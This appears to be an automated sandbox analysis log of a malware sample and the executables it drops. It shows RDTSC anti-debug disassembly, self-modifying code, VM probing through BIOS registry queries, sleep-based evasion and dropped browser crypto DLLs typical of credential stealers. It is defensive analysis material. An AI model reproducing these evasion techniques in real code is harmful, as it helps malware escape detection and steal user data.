                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020708 second address: 5020724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2E8CE5B9h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020724 second address: 502073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925507h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502073F second address: 502076D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 26DA3E21h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB6CC860F2Ah 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502076D second address: 50207DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 502A9021h 0x00000010 pushad 0x00000011 mov al, EAh 0x00000013 jmp 00007FB6CD925501h 0x00000018 popad 0x00000019 mov eax, dword ptr fs:[00000000h] 0x0000001f pushad 0x00000020 mov al, 5Fh 0x00000022 pushfd 0x00000023 jmp 00007FB6CD925509h 0x00000028 sbb si, 35B6h 0x0000002d jmp 00007FB6CD925501h 0x00000032 popfd 0x00000033 popad 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50207DA second address: 50207DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50207DE second address: 50207F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50207F1 second address: 50208B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6CC860F2Fh 0x00000009 xor esi, 78C8A39Eh 0x0000000f jmp 00007FB6CC860F39h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FB6CC860F30h 0x0000001b adc cx, 6D98h 0x00000020 jmp 00007FB6CC860F2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a pushad 0x0000002b pushad 0x0000002c mov eax, ebx 0x0000002e jmp 00007FB6CC860F31h 0x00000033 popad 0x00000034 mov edi, ecx 0x00000036 popad 0x00000037 nop 0x00000038 jmp 00007FB6CC860F2Ah 0x0000003d sub esp, 1Ch 0x00000040 pushad 0x00000041 push esi 0x00000042 pushfd 0x00000043 jmp 00007FB6CC860F2Dh 0x00000048 add cx, EC96h 0x0000004d jmp 00007FB6CC860F31h 0x00000052 popfd 0x00000053 pop eax 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FB6CC860F39h 0x0000005d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50208B6 second address: 50208BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50208BC second address: 50208C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50208C0 second address: 50208C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50208C4 second address: 50208F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, 6AFBh 0x0000000e movzx eax, di 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 jmp 00007FB6CC860F33h 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50208F1 second address: 50208F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50208F5 second address: 50208FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50208FB second address: 5020941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6CD925508h 0x00000009 xor cl, FFFFFFD8h 0x0000000c jmp 00007FB6CD9254FBh 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB6CD925501h 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020941 second address: 5020956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020956 second address: 502095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502095E second address: 5020A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FB6CC860F35h 0x0000000f jmp 00007FB6CC860F2Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FB6CC860F38h 0x0000001b or esi, 0BAAC228h 0x00000021 jmp 00007FB6CC860F2Bh 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 jmp 00007FB6CC860F36h 0x0000002e push eax 0x0000002f jmp 00007FB6CC860F2Bh 0x00000034 xchg eax, edi 0x00000035 pushad 0x00000036 movzx esi, dx 0x00000039 mov edx, 43926F64h 0x0000003e popad 0x0000003f mov eax, dword ptr [76FBB370h] 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FB6CC860F36h 0x0000004b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020A00 second address: 5020A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020A18 second address: 5020A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020A1E second address: 5020A46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b jmp 00007FB6CD925501h 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020A46 second address: 5020A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020A4C second address: 5020A74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925502h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB6CD9254FDh 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020A74 second address: 5020A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020A89 second address: 5020AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB6CD9254FDh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020AAE second address: 5020ACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020ACC second address: 5020AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020AD0 second address: 5020AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020AD6 second address: 5020ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020ADC second address: 5020AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020AE0 second address: 5020B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], eax 0x00000011 pushad 0x00000012 jmp 00007FB6CD9254FEh 0x00000017 mov dx, ax 0x0000001a popad 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f mov edx, ecx 0x00000021 jmp 00007FB6CD925506h 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+10h] 0x0000002a pushad 0x0000002b jmp 00007FB6CD9254FEh 0x00000030 call 00007FB6CD925502h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020B4E second address: 5020BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 test eax, eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FB6CC860F2Dh 0x0000000f xor eax, 2F9B96B6h 0x00000015 jmp 00007FB6CC860F31h 0x0000001a popfd 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e jne 00007FB73E7000CAh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FB6CC860F2Fh 0x0000002d sbb esi, 2A28A3EEh 0x00000033 jmp 00007FB6CC860F39h 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007FB6CC860F30h 0x0000003f and al, 00000068h 0x00000042 jmp 00007FB6CC860F2Bh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BDA second address: 5020BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BE0 second address: 5020BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BE4 second address: 5020BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BFD second address: 5020C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ax, di 0x00000008 popad 0x00000009 mov dword ptr [ebp-20h], eax 0x0000000c pushad 0x0000000d mov edi, 5272D0F8h 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007FB6CC860F37h 0x00000019 pop eax 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C29 second address: 5020CB7 instructions: 0x00000000 rdtsc 0x00000002 call 00007FB6CD925509h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebx, dword ptr [esi] 0x0000000d jmp 00007FB6CD925507h 0x00000012 mov dword ptr [ebp-24h], ebx 0x00000015 pushad 0x00000016 mov ebx, ecx 0x00000018 pushfd 0x00000019 jmp 00007FB6CD925500h 0x0000001e add eax, 51E6F018h 0x00000024 jmp 00007FB6CD9254FBh 0x00000029 popfd 0x0000002a popad 0x0000002b test ebx, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 movsx edi, ax 0x00000033 pushfd 0x00000034 jmp 00007FB6CD9254FCh 0x00000039 jmp 00007FB6CD925505h 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
                          Tries to evade debugger and weak emulator (self modifying code)
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F9EDF4 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: FEDF4 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSpecial instruction interceptor: First address: 94FB60 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSpecial instruction interceptor: First address: AEEB76 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSpecial instruction interceptor: First address: B00D98 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSpecial instruction interceptor: First address: B75BB7 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeSpecial instruction interceptor: First address: B6DDF1 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeSpecial instruction interceptor: First address: B6DD0D instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeSpecial instruction interceptor: First address: D15C4A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeSpecial instruction interceptor: First address: D158FF instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeSpecial instruction interceptor: First address: B6B636 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeSpecial instruction interceptor: First address: D3DDAA instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeSpecial instruction interceptor: First address: 8259AA instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeSpecial instruction interceptor: First address: 9C4CDC instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeSpecial instruction interceptor: First address: 8234C6 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeSpecial instruction interceptor: First address: 9EF748 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeSpecial instruction interceptor: First address: DA9518 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeMemory allocated: 49D0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeMemory allocated: 4B50000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeMemory allocated: 6B50000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeMemory allocated: 4B70000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeMemory allocated: 4DE0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeMemory allocated: 4B70000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0507050F rdtsc 0_2_0507050F
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 938Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1107Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1008Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1094Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1111Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1063Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1100Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1118Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow / User API: threadDelayed 1288
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow / User API: threadDelayed 876
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow / User API: threadDelayed 1278
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow / User API: threadDelayed 1275
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow / User API: threadDelayed 1273
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow / User API: threadDelayed 1264
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow / User API: threadDelayed 1288
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeWindow / User API: threadDelayed 3392
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow / User API: threadDelayed 1177
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow / User API: threadDelayed 1183
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow / User API: threadDelayed 986
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow / User API: threadDelayed 1150
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow / User API: threadDelayed 1295
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow / User API: threadDelayed 1283
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow / User API: threadDelayed 1144
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow / User API: threadDelayed 1044
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow / User API: threadDelayed 1232
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow / User API: threadDelayed 1201
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow / User API: threadDelayed 1130
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeWindow / User API: threadDelayed 2184
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeWindow / User API: threadDelayed 8760
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_7-14120
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7620Thread sleep count: 938 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7620Thread sleep time: -1876938s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7592Thread sleep count: 1107 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7592Thread sleep time: -2215107s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7580Thread sleep count: 246 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7580Thread sleep time: -7380000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7596Thread sleep count: 1008 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7596Thread sleep time: -2017008s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7604Thread sleep count: 1094 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7604Thread sleep time: -2189094s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7616Thread sleep count: 1111 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7616Thread sleep time: -2223111s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7608Thread sleep count: 1063 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7608Thread sleep time: -2127063s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7600Thread sleep count: 1100 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7600Thread sleep time: -2201100s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7612Thread sleep count: 1118 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7612Thread sleep time: -2237118s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe TID: 1072Thread sleep time: -210000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe TID: 3476Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 7352Thread sleep count: 1288 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 7352Thread sleep time: -2577288s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 3156Thread sleep count: 876 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 3156Thread sleep time: -1752876s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 4432Thread sleep count: 1278 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 4432Thread sleep time: -2557278s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 5572Thread sleep time: -52000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 4040Thread sleep count: 1275 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 4040Thread sleep time: -2551275s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 3544Thread sleep count: 1273 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 3544Thread sleep time: -2547273s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 7380Thread sleep count: 1264 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 7380Thread sleep time: -2529264s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 7372Thread sleep count: 1288 > 30
